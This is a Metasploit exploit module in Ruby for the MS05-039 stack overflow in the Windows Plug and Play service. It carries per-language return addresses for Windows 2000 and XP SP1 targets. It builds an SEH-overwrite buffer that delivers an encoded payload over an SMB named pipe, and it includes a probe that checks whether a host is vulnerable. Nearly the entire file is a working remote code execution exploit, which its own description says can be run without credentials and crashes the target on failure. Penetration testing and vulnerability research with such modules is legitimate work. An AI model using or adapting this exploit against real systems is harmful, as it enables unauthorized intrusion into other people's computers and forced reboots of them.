##
# $Id: ms05_039_pnp.rb 4498 2007-03-01 08:21:36Z mmiller $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB
	

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Plug and Play Service Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Windows Plug
				and Play service. This vulnerability can be exploited on
				Windows 2000 without a valid user account. Since the PnP
				service runs inside the service.exe process, a failed
				exploit attempt will cause the system to automatically
				reboot. 
					
			},
			'Author'         => [ 'hdm', 'bmc' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					[ 'OSVDB', '18605'],
					[ 'CVE', '2005-1983'],
					[ 'BID', '14513'],
					[ 'MSB', 'MS05-039'],
					[ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/'],
					[ 'MIL', '87'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "",
					'Compat'   => 
					{
						# -ws2ord XXX?
					},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 French',
						{
							'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
						},
					],
					[ 
						'Windows 2000 SP4 Spanish',
						{
							'Ret'      => 0x767738f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 English/French/German/Dutch',
						{
							'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
						},
					],					
					[ 
						'Windows 2000 SP0-SP4 German',
						{
							'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>	
						},
					],
					[ 
						'Windows 2000 SP0-SP4 Italian',
						{
							'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
						},
					],
					[
						'Windows XP SP1 English',
						{
							'Ret'      => 0x758c572a,
							'Pipe'     => 'ntsvcs',
							'Offset'   => 16,
						}
					]																		
				],

			'DefaultTarget' => 0,
			'DisclosureDate' => 'Aug 9 2005'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
			], self.class)
						
	end

	def pnp_probe(req, pipe = datastore['SMBPIPE'])
		
		print_status("Connecting to the SMB service...")
		connect()
		smb_login()

		handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# CS_DES
		cs_des = 
			NDR.long(0) + # CSD_SignatureLength
			NDR.long(0) + # CSD_LegacyDataOffset
			NDR.long(req.length) + # CSD_LegacyDataSize
			NDR.long(0) + # CSD_Flags
			rand_text(16) + # GUID
			req # CSD_LegacyData

		# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
		
		# ResourceName:
		stubdata = 
			NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
			NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
			NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
			NDR.long(cs_des.length) +                        # ResourceLen	
			NDR.long(4) +                                    # OutputLen (at least 4)
			NDR.long(0)                                      # Flags

		print_status("Calling the vulnerable function...")
		
		begin
			dcerpc.call(0x36, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_good('Server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_good('Server disconnected, this is expected')
			else
				raise e
			end
		else 
			print_status('The server should have executed our payload')
		end

		# Cleanup
		handler
		disconnect	
	
		if (dcerpc.last_response != nil and 
			dcerpc.last_response.stub_data != nil and 
			dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
			return true
		else 
			return false
		end
	end
	
	def check
		if (pnp_probe('A'))
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit		
		# Pad the string up to reach our SEH frame
		buf = rand_text(target['Offset'] ? target['Offset'] : 56)

		# Jump over the address and our invalid pointer to the payload
		buf << Rex::Arch::X86.jmp_short('$+32')
		buf << rand_text(2)

		# The SEH handler pointer
		buf << [target.ret].pack('V')
		
		# Some padding to reach the next pointer
		buf << rand_text(20)
		
		# ResourceName - cause access violation on RtlInitUnicodeString
		buf << rand_text(3) + "\xff"
		
		# Append the encoded payload and we are good to go!
		buf << payload.encoded
		
		# Determine which pipe to use
		pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

		pnp_probe(buf, pipe)	
	end

end
end	
